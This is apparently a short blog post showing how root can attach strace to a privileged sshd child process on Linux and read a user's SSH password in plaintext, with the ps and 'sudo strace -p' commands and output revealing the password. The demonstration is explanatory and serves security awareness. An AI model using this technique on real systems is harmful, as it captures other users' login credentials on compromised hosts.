Strace is a debugging tool in linux to debug running process by attaching to the process. strace gives you the system calls a running program is making and also the arguments.
It’s not a vulnerability because you already need to be root to perform this. But if your system is already compromised and users are trying to do ssh into that system then it can be big mess.
For this demonstration, I am running sshd on my laptop.
ssh debojit@localhost
debojit@localhost’s password:
Permission denied, please try again.
sshd forks and create process to handle incoming connection. I can find the process by
ps aux | grep sshroot 973 0.0 0.1 65520 6228 ? Ss 11:41 0:00 /usr/sbin/sshd -D
debojit 8407 0.0 0.1 44916 5300 pts/18 S+ 12:06 0:00 ssh debojit@localhost
root 8408 0.0 0.1 96124 6648 ? Ss 12:06 0:00 sshd: debojit [priv]
sshd 8409 0.0 0.0 66864 3036 ? S 12:06 0:00 sshd: debojit [net]
Now I can use strace to spy on the child sshd process which will try to send the password to the main sshd process.
Here is the strace output to it
sudo strace -p 8408strace: Process 8408 attached
restart_syscall(<... resuming interrupted poll ...>) = 1
read(6, "\0\0\0\r", 4) = 4
read(6, "\f\0\0\0\10mysecure", 13) = 13
getuid() = 0
You can see in the 4th line in the read system call, my ssh password is “mysecure”
Thanks for reading :) cheers-